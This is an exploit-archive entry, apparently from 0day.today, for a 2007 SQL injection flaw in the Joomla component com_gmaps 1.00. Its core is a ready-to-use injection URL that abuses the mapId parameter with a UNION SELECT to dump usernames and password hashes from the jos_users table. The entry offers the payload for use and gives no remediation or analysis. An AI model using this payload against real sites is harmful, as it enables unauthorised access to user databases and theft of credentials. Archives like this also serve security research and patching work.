id: 2056
date: 07/30/2007
title: Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection
author: xoron
cves: 

============================================================
Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection
============================================================


joomla com_gmaps 1.00 Remote SQl Injection
 
Found: Cyber-Security
 
Exploit:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*




#  0day.today [2023-03-25]  #